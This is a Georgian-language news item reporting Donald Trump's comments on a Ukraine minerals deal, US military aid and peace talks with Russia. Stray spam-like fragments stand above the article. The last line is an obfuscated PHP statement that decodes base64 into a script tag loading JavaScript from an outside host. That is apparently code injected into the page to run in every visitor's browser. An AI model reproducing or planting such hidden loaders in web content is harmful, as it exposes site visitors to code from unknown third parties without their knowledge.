tube
ავერსი jaluzi

ამერიკის პრეზიდენტის დონალდ ტრამპის განცხადებით, მას ამ ეტაპზე, უკრაინისთვის სამხედრო დახმარების შეწყვეტაზე არც კი უსაუბრია, თუმცა არ იცის რა იქნება მომავალში.

“ყველა უნდა შევიდეს ერთ ოთახში და უნდა მივაღწიოთ შეთანხმებას,” .

 მისი თქმით, უკრაინასთან მინერალების შესახებ შეთანხმება მკვდარი არ არის.

„გაიგებთ, ხვალ საღამოს სიტყვით გამოვდივარ და გაიგებთ. შესანიშნავი შეთანხმებაა ჩვენთვის, რადგან ბაიდენმა სულელურად 350 მილიარდი მისცა ქვეყანას საბრძოლველად და ჩვენ არაფერი მიგვიღია. 350 მილიარდით აშშ-ის ფლოტის განახლებას შევძლებდით“, - აღნიშნა აშშ-ის პრეზიდენტმა.

მისივე თქმით, სჯერა, რომ რუსეთს სურს შეთანხმების მიღწევა და თუ ვინმეს არ სურს, დიდხანს ვერ დარჩება.

"შესაძლოა, ვინმეს შეთანხმების მიღწევა არ სურს და თუ ვინმეს შეთანხმების მიღწევა არ სურს, ვფიქრობ, რომ ეს ადამიანი დიდხანს არ დარჩება. ამ ადამიანს დიდხანს არ მოუსმენენ, რადგან მჯერა, რომ რუსეთს შეთანხმების მიღწევა სურს და რა თქმა უნდა, მჯერა, რომ უკრაინელ ხალხს შეთანხმების მიღწევა სურს" , - აღნიშნა ტრამპმა.

ამასთან, დონალდ ტრამპის განცხადებით, უკრაინისთვის სამხედრო დახმარების შეჩერების შესახებ არც კი უსაუბრია.

„ამის შესახებ არც კი მისაუბრია. ვგულისხმობ, პირდაპირ ახლა. ვნახოთ რა იქნება. ამ მომენტში ძალიან ბევრი რამ ხდება“, - განაცხადა დონალდ ტრამპმა.

165
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");